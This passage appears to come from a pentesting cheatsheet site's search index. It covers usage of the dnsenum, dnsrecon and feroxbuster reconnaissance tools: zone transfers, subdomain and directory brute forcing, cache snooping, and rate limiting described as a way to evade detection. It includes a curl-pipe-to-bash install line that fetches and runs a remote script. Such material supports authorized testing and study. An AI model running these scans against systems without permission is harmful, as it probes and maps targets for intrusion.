style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver 8.8.8.8 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --enum \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --threads \u003cspan style=\"color:#ae81ff\"\u003e20\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o results.xml \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"dnsenum"},{"content":"dnsrecon Cheatsheet Type: Versatile DNS reconnaissance — multiple techniques, customisable output formats\nInstallation sudo apt install dnsrecon # or git clone https://github.com/darkoperator/dnsrecon.git pip3 install -r requirements.txt Basic Usage dnsrecon -d \u0026lt;domain\u0026gt; dnsrecon -d example.com Scan Types (-t) Type Description std Standard — A, AAAA, NS, SOA, MX, TXT records axfr Zone transfer attempt on all nameservers brt Brute force subdomains from wordlist rvl Reverse lookup on IP range goo Google scraping for subdomains snoop Cache snooping on nameservers tld Check all TLD variations of domain zonewalk DNSSEC zone walking (NSEC enumeration) srv SRV record enumeration bing Bing scraping for subdomains crt Certificate transparency logs Common Flags Flag Description -d \u0026lt;domain\u0026gt; Target domain -t \u0026lt;type\u0026gt; Scan type (see table above) -D \u0026lt;wordlist\u0026gt; Wordlist for brute force (brt) -n \u0026lt;nameserver\u0026gt; Use specific nameserver -r \u0026lt;cidr\u0026gt; IP range for reverse lookups -c \u0026lt;file\u0026gt; Save output to CSV -j \u0026lt;file\u0026gt; Save output to JSON -x \u0026lt;file\u0026gt; Save output to XML --db \u0026lt;file\u0026gt; Save output to SQLite DB -f Filter wildcard results -a Perform AXFR on all nameservers --iw Continue brute force even if wildcard detected -v Verbose output --lifetime \u0026lt;s\u0026gt; Query lifetime in seconds --tcp Use TCP for queries -t std,brt Combine multiple scan types Common Commands # Standard enumeration (all record types) dnsrecon -d example.com -t std # Zone transfer attempt dnsrecon -d example.com -t axfr # Brute force subdomains dnsrecon -d example.com -t brt -D wordlist.txt # Reverse lookup on a range dnsrecon -r 192.168.1.0/24 -t rvl # Cache snooping dnsrecon -t snoop -n \u0026lt;nameserver\u0026gt; -D wordlist.txt # DNSSEC zone walking dnsrecon -d example.com -t zonewalk # Certificate transparency dnsrecon -d example.com -t crt # Multiple scan types at once dnsrecon -d example.com -t std,axfr,brt -D wordlist.txt # Use specific nameserver dnsrecon -d example.com -n 8.8.8.8 -t std # Output to JSON dnsrecon -d example.com -t std -j output.json # Output to CSV dnsrecon -d example.com -t brt -D wordlist.txt -c output.csv # Filter wildcards during brute force dnsrecon -d example.com -t brt -D wordlist.txt -f # Force brute force through wildcard dnsrecon -d example.com -t brt -D wordlist.txt --iw Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Run dnsrecon -d example.com \\ -t std,axfr,brt \\ -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -n 8.8.8.8 \\ -f \\ -j dnsrecon_results.json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/dnsrecon/","summary":"\u003ch1 id=\"dnsrecon-cheatsheet\"\u003ednsrecon Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Versatile DNS reconnaissance — multiple techniques, customisable output formats\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install dnsrecon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/darkoperator/dnsrecon.git\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install -r requirements.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"scan-types--t\"\u003eScan Types (\u003ccode\u003e-t\u003c/code\u003e)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eType\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003estd\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eStandard — A, AAAA, NS, SOA, MX, TXT records\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eaxfr\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eZone transfer attempt on all nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ebrt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBrute force subdomains from wordlist\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ervl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReverse lookup on IP range\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003egoo\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGoogle scraping for subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esnoop\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCache snooping on nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003etld\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCheck all TLD variations of domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ezonewalk\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNSSEC zone walking (NSEC enumeration)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esrv\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSRV record enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ebing\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBing scraping for subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecrt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCertificate transparency logs\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;type\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan type (see table above)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-D \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist for brute force (\u003ccode\u003ebrt\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-n \u0026lt;nameserver\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse specific nameserver\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;cidr\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIP range for reverse lookups\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to CSV\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-j \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to JSON\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to XML\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--db \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to SQLite DB\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter wildcard results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePerform AXFR on all nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--iw\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eContinue brute force even if wildcard detected\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--lifetime \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuery lifetime in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--tcp\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse TCP for queries\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t std,brt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCombine multiple scan types\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Standard enumeration (all record types)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Zone transfer attempt\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t axfr\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Reverse lookup on a range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -r 192.168.1.0/24 -t rvl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Cache snooping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -t snoop -n \u0026lt;nameserver\u0026gt; -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# DNSSEC zone walking\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t zonewalk\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Certificate transparency\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t crt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple scan types at once\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std,axfr,brt -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific nameserver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -n 8.8.8.8 -t std\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std -j output.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to CSV\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt -c output.csv\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter wildcards during brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt -f\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Force brute force through wildcard\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt --iw\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-run\"\u003eExample Full Run\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t std,axfr,brt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -n 8.8.8.8 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -f \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -j dnsrecon_results.json\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"dnsrecon"},{"content":"feroxbuster Cheatsheet Type: Fast Rust-based web fuzzer — recursive directory brute forcing, wildcard detection, rich filtering\nInstallation sudo apt install feroxbuster # or curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash # or cargo install feroxbuster Basic Usage feroxbuster -u http://\u0026lt;ip\u0026gt; feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt Common Flags Flag Description -u \u0026lt;url\u0026gt; Target URL -w \u0026lt;wordlist\u0026gt; Wordlist (default: built-in if not specified) -t \u0026lt;n\u0026gt; Threads (default: 50) -x \u0026lt;ext\u0026gt; File extensions to append -d \u0026lt;n\u0026gt; Recursion depth (default: 4, 0 = unlimited) -r Follow redirects -k Disable TLS certificate verification -n Disable recursion -C \u0026lt;codes\u0026gt; Filter out status codes -s \u0026lt;codes\u0026gt; Only show these status codes -S \u0026lt;size\u0026gt; Filter by response size (bytes) -W \u0026lt;words\u0026gt; Filter by word count in response -L \u0026lt;lines\u0026gt; Filter by line count in response -X \u0026lt;regex\u0026gt; Filter by response body regex -H \u0026lt;header\u0026gt; Add custom header (repeatable) -b \u0026lt;cookie\u0026gt; Add cookie -m \u0026lt;methods\u0026gt; HTTP methods (default: GET) -o \u0026lt;file\u0026gt; Output to file -q Quiet — no banner or progress --json Output as JSON -v Verbose -T \u0026lt;seconds\u0026gt; Request timeout --rate-limit \u0026lt;n\u0026gt; Max requests per second -p \u0026lt;proxy\u0026gt; Use proxy (http/socks5) -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; HTTP Basic auth -a \u0026lt;agent\u0026gt; User-Agent string --dont-filter Disable wildcard filtering --auto-tune Automatically slow down on errors --collect-extensions Collect and scan discovered extensions --collect-words Build wordlist from responses --resume-from \u0026lt;file\u0026gt; Resume from a saved state file Common Commands # Basic scan with extensions feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -x php,html,txt # No recursion (flat scan) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -n # Limit recursion depth feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -d 2 # Filter out 404s and 403s feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -C 404,403 # Only show 200 and 301 feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -s 200,301 # Filter responses by size (remove default page noise) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -S 1234 # Filter by word count feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -W 25 # HTTPS with TLS skip feroxbuster -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k # Custom headers (e.g. API auth) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -H \u0026#34;Authorization: Bearer \u0026lt;token\u0026gt;\u0026#34; \\ -H \u0026#34;X-Custom: value\u0026#34; # Use proxy (Burp Suite) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -p http://127.0.0.1:8080 -k # POST requests feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m POST # Multiple HTTP methods feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m GET,POST,PUT # Output to file (also saves state for resume) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -o results.txt # JSON output feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --json -o results.json # Resume interrupted scan feroxbuster --resume-from ferox-\u0026lt;ip\u0026gt;.state # Rate limit (be polite / evade detection) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --rate-limit 100 # Collect extensions seen in responses and scan them too feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-extensions # Build a wordlist from page content, then use it feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-words Virtual Host Discovery # feroxbuster doesn\u0026#39;t natively fuzz Host headers # Use with -H to manually set a specific host header, # or use ffuf/gobuster for vhost fuzzing feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -H \u0026#34;Host: staging.example.com\u0026#34; Interactive Pause Menu While feroxbuster is running, press ENTER to open the interactive menu:\n[p]ause / [r]esume scanning [q]uit (saves state for --resume-from) [s]how stats [a]dd url to scan [f]ilter response by size Configuration File Default config: ~/.config/feroxbuster/ferox-config.toml\nwordlist = \u0026#34;/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\u0026#34; threads = 50 depth = 3 timeout = 7 status_codes = [200, 204, 301, 302, 307, 308, 401, 403] filter_status = [404] extensions = [\u0026#34;php\u0026#34;, \u0026#34;html\u0026#34;, \u0026#34;txt\u0026#34;] Recommended Wordlists /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt Example Full Run feroxbuster \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \\ -x php,html,txt,bak \\ -t 50 \\ -d 3 \\ -C 404,403 \\ -k \\ --auto-tune \\ -o ferox_results.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/feroxbuster/","summary":"\u003ch1 id=\"feroxbuster-cheatsheet\"\u003eferoxbuster Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast Rust-based web fuzzer — recursive directory brute forcing, wildcard detection, rich filtering\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install feroxbuster\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 